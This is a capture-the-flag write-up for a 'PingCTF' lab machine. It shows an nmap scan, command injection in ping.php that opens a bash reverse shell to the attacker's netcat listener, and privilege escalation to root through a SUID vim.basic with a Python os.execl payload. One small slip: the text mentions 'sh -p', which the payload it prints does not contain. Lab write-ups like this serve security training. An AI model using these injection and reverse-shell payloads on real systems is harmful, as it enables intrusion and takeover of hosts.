PingCTF

Reconnaissance

┌──(zwique㉿zwique)-[~/Downloads]
└─$ nmap 172.17.0.2 -sV -A -p- 
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-08-05 19:57 +08
Nmap scan report for 172.17.0.2
Host is up (0.000043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Ping
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.04 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds

Well, there is only one open port. Let's check it out.

"Once you access port 80, you'll see a simple IP address checker page. Try sending a request by clicking the blue button. Eventually, it redirects to ping.php?target=. So, I tried this Command Injection payload: 127.0.0.1; ls worked perfectly, listing files under the www-data user. Now, instead of the ls command, try injecting a reverse shell that connects back to your netcat listener.

www-data

Start netcat lister: nc -lnvp 4444

Injection the payload: 127.0.0.1; bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1' OR http://172.17.0.2/ping.php?target=127.0.0.1%3B+bash+-c+'bash+-i+>%26+%2Fdev%2Ftcp%2F172.17.0.1%2F4444+0>%261'

Root

The first thing I did was running linpeas.sh script and looked for suspicious things. Then I've found one file called vim.basic which has root access.

You can find it from SUID Files: find / -perm -u=s -type f 2>/dev/null

www-data@f2456883b1f4:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/vim.basic
www-data@f2456883b1f4:/var/www/html$ ls -l /usr/bin/vim.basic
ls -l /usr/bin/vim.basic -rwsr-xr-x 1 root root 4126400 Apr  1 20:12 /usr/bin/vim.basic

I looked over the internet about Privilege Escalation Vulnerability in Vim editor and found quite good one here.

I tried the first payload, but it didn't work as expected because Vim intentionally drops root privileges at startup.

To get know more about our vim.basic, I used /usr/bin/vim.basic --help command to get information.

www-data@f2456883b1f4:/var/www/html$ /usr/bin/vim.basic --version
/usr/bin/vim.basic --version
VIM - Vi IMproved 9.1 (2024 Jan 02, compiled Apr 01 2025 20:12:31)
Included patches: 1-16, 647, 678, 697
Modified by team+vim@tracker.debian.org
Compiled by team+vim@tracker.debian.org
Huge version without GUI.  Features included (+) or not (-):
+acl               +file_in_path      +mouse_urxvt       -tag_any_white
+arabic            +find_in_path      +mouse_xterm       -tcl
+autocmd           +float             +multi_byte        +termguicolors
+autochdir         +folding           +multi_lang        +terminal
-autoservername    -footer            -mzscheme          +terminfo
-balloon_eval      +fork()            +netbeans_intg     +termresponse
+balloon_eval_term +gettext           +num64             +textobjects
-browse            -hangul_input      +packages          +textprop
++builtin_terms    +iconv             +path_extra        +timers
+byte_offset       +insert_expand     -perl              +title
+channel           +ipv6              +persistent_undo   -toolbar
+cindent           +job               +popupwin          +user_commands
-clientserver      +jumplist          +postscript        +vartabs
-clipboard         +keymap            +printer           +vertsplit
+cmdline_compl     +lambda            +profile           +vim9script
+cmdline_hist      +langmap           -python            +viminfo
+cmdline_info      +libcall           +python3           +virtualedit
+comments          +linebreak         +quickfix          +visual
+conceal           +lispindent        +reltime           +visualextra
+cryptv            +listcmds          +rightleft         +vreplace
+cscope            +localmap          -ruby              +wildignore
+cursorbind        -lua               +scrollbind        +wildmenu
+cursorshape       +menu              +signs             +windows
+dialog_con        +mksession         +smartindent       +writebackup
+diff              +modify_fname      +sodium            -X11
+digraphs          +mouse             -sound             +xattr
-dnd               -mouseshape        +spell             -xfontset
-ebcdic            +mouse_dec         +startuptime       -xim
+emacs_tags        +mouse_gpm         +statusline        -xpm
+eval              -mouse_jsbterm     -sun_workshop      -xsmp
+ex_extra          +mouse_netterm     +syntax            -xterm_clipboard
+extra_search      +mouse_sgr         +tag_binary        -xterm_save
-farsi             -mouse_sysmouse    -tag_old_static    
   system vimrc file: "/etc/vim/vimrc"
     user vimrc file: "$HOME/.vimrc"
 2nd user vimrc file: "~/.vim/vimrc"
      user exrc file: "$HOME/.exrc"
       defaults file: "$VIMRUNTIME/defaults.vim"
  fall-back for $VIM: "/usr/share/vim"
Compilation: gcc -c -I. -Iproto -DHAVE_CONFIG_H -Wdate-time -g -O2 -fno-omit-frame-pointer -mno-omit-leaf-frame-pointer -ffile-prefix-map=/build/vim-AkQQan/vim-9.1.0016=. -flto=auto -ffat-lto-objects -fstack-protector-strong -fstack-clash-protection -Wformat -Werror=format-security -fcf-protection -fdebug-prefix-map=/build/vim-AkQQan/vim-9.1.0016=/usr/src/vim-2:9.1.0016-1ubuntu7.8 -DSYS_VIMRC_FILE=\"/etc/vim/vimrc\" -DSYS_GVIMRC_FILE=\"/etc/vim/gvimrc\" -D_REENTRANT -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1 
Linking: gcc -Wl,-Bsymbolic-functions -flto=auto -ffat-lto-objects -Wl,-z,relro -Wl,-z,now -Wl,--as-needed -o vim -lm -ltinfo -lselinux -lsodium -lacl -lattr -lgpm -L/usr/lib/python3.12/config-3.12-x86_64-linux-gnu -lpython3.12 -ldl -lm

Perfect, it's being compiled by +python3 That means I can escalate to root using Python inside Vim by spawning a root shell via SUID privileges. Use the third c) payload from GTFOBins

1. /usr/bin/vim.basic
2. vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

What this does:

Runs Python3 inside Vim

Calls os.execl() to launch a new shell

sh -p preserves the SUID root privileges

You now have a real root shell! 🎉 This is how I got so far.

PreviousBola NextMyBB

Last updated 5 months ago

hashtagReconnaissance

hashtagwww-data

hashtagRoot

Reconnaissance

www-data

Root